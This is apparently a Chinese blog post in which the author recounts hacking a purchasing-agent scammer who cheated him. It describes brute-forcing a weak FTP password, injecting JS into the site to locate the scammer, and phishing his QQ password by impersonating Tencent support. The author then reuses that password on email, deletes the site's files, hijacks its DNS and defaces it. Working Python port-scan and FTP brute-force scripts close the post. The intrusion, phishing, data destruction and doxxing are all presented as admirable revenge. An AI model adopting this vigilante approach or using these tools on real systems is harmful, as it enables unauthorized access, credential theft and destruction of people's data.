• 一个精壮的代购骗子被我彻底征服


    i春秋作家:阿甫哥哥

    0×01 苦逼的开头–前言

    当我朋友圈被代购侵犯时,觉得什么东西都好便宜的,有代购包的,潮牌的,化妆品的,一堆一堆的…..当时我的心情是这样的

    image.png

    以前一直也相安无事,直到前天,找了个代购,想买买supreme的tee,作为一个冉冉升起的新星黑客,我竟然被骗了。。很扎心,被骗900多显然也够不成立案标准,但也够我买好几箱辣条了……气得我发下毒誓要顺着网线去打他……

    我朋友圈的吐槽

    image.png

    事情不能就这么完了!我可是i春秋论坛的首席帅哥哥,反击行动开始!

    image.png

    过程真心比我想象的还要精彩,此所谓多行不义必自毙,哈哈哈。

    由于最近我在写Python工具集,所以,文中所用的工具都自己开发吧……

    0×02 前期的破坏–干掉他的网站

    那个代购之前跟我吹牛逼说,他有专门的网站….嘿嘿,这就好办了,我打算从这入手吧,于是,我搞了个WX小号,去加了那个代购的wx….先套出他的网站地址…..

    image.png

    image.png

    然后就套到了他的网站地址…..尼玛,貌似没有一点难度….这怎么凸显我的社工能力,算了,看看他的网站吧…

    image.png

    接着来一波信息采集工作吧…

    查了他的whois,并没有弄隐私保护,然后爆出了他的名字and手机号and邮箱,跟我被套路的时候,转账的手机号和名字一样唉….目测就是这货了

    image.png

    接下来,端口扫描,21端口开着…(我会在文章结尾放上工具脚本的….)

    C段什么的就不做了,没什么大意义,目录扫描也不用了目测…这辣鸡意识..没谁了

    image.png

    不放过21端口的开启,来一波fuzz,万一弱口令呢….

    FTP爆破工具走一波

    image.png

    尴尬了,我靠,直接就是弱口令,我的妈耶…..

    差不多,整个站的权限已经在手上了….

    然后传个黑页吗??搞得感觉像个小学生,但是好气哦,后面搞得他更多的信息,就整个吧,啊哈哈…

    0×03 进击的巨人–获取他的各种信息

    他说他是日本代购,那咱们就定位一下他,到底在不在国外吧,呵呵哒

    参考的方法是:

    https://bbs.ichunqiu.com/thread-33742-1-1.html

    既然咱们已经拿到了他站的权限,那么,咱们可以在主页插入一段JS,获取他的ip

    Index.php:

    image.png

    然后走一波套路….

    image.png

    洗洗先睡觉了,第二天继续….

    睡一觉起来,上钩了..这二货还跟我解释….我有句mmp不知道当讲不当讲…

    image.png

    获得了他的经纬度

    image.png

    查询一下

    http://www.gpsspg.com/maps.htm

    image.png

    好好的一个日本代购??跑到国内了??我特么的,竟然被他套路了,我心态崩了

    以为到这就结束了??

    没有,远远不够……

    既然咱们有他的手机号,那咱们可以尝试搜一波他的QQ

    由于他的手机号绑定的就是他本人wx,就不继续测试wx了..

    image.png

    然后加他一波…万一成功了呢….

    然后经过了n个小时的漫长等待,加上了….二话不说,直接进空间….

    然后找到了他的自拍,我收回我之前要顺着网线去打他这句话….

    image.png

    然后继续套路他一波??假装腾讯客服送他各种钻,万一他中招了….

    我胡乱说的一些老套路,我自己都难说服自己的。。但是他竟然信了…..

    image.png

    image.png

    image.png

    这就获取到了他的QQ密码,所以一般人的安全意识还是很差的!!请不要骗黑客好吗!!

    于是我尝试登了一下他的邮箱…

    Qq邮箱凉凉了,有独立密码,我也猜不到..算了…

    image.png

    试试他之前的那个网易邮箱吧….

    image.png

    登上去,然而,什么都没有,目测是都删了…..

    继续尝试下,用这个密码,咱们试下他的邮箱用户名是不是他的域名注册的那个id

    然后我竟然直接登上去了…这是rp好吗??

    image.png

    然后我又可以修改他的dns了…然后实现域名劫持什么的….反正我也有他FTP的权限,我先把它主机的东西全删了去….mmp…

    image.png

    然后来个域名劫持….修改他的解析,解析到我创的虚拟主机上….

    image.png

    然后差不多就结束了

    0×04 华丽的谢幕–摊牌

    挂上黑页..强行装一波….

    image.png

    拿到了这么多信息,可以找他摊牌了,mmp

    image.png

    image.png

    image.png

    image.png

    我打算放过他了,毕竟他有了这次经历,估计也不敢再骗人了

    毕竟我的心愿是世界和平…

    0×05 总结

    这次可以算是运气好吧…..希望各位不要有当骗子的冲动,恶人是有恶报的…,你还要知道,人外有人,天外有天….附上文中所用的工具吧….

    这里我放出的是单线程版的,期待我后面的系列文章吧,我会出多线程版的,啊哈哈哈

    portscan.py

    #-*- coding: UTF-8 -*-

    import socket

    def Get_ip(domain):  

        try:  

            return socket.gethostbyname(domain)  

        except socket.error,e:  

            print ‘%s: %s’%(domain,e)  

            return 0 

    def PortScan(ip):

        result_list=list()

        port_list=range(1,65535)

        for port in port_list:

            try:

                s=socket.socket() 

                s.settimeout(0.1)

                s.connect((ip,port))

                openstr= ” PORT:”+str(port) +” OPEN “

                print openstr

                result_list.append(port)

                s.close()

            except:

                pass

        print result_list

    def main():

        domain = raw_input(“PLEASE INPUT YOUR TARGET:”)

        ip = Get_ip(domain)

        print ‘IP:’+ip

        PortScan(ip)

    if __name__==’__main__’:  

        main()

    BruteFTP.py

    #-*- coding: UTF-8 -*-

    from ftplib import FTP

    import ftplib

    def Login(host,username,password):

        ftp=FTP()

        try:

            ftp.connect(host,21,1)

            ftp.login(username,password)

            print ‘Crack successly!’

            print ‘username:’ + username

            print ‘Password:’ + password

            return True

        except:

            pass

    if __name__ == ‘__main__’:

            host=open(‘host.txt’)

            for line in host:

                    host=line.strip(‘ ’)

                    print ‘Target:’ + host

                    user=open(‘user.txt’)

                    for line in user:

                            user=line.strip(‘ ’)

                            pwd=open(‘pwd.txt’,'r’)

                            for line in pwd:

                                    pwd=line.strip(‘ ’)

                                    Login(host,user,pwd)

    Peace and love…

  • 相关阅读:
    conda安装使用
    数据库删除后台代码
    表格显示数据库(html和php混编)
    唯一用户名jquery和PHP代码
    //阿贾克斯提交数据库
    //向数据库添加数据(form表单提交)
    //conn数据库配置
    Css 变量
    input标签让光标不出现
    Es6Class
  • 原文地址:https://www.cnblogs.com/ichunqiujishu/p/8745295.html
Copyright © 2020-2023  润新知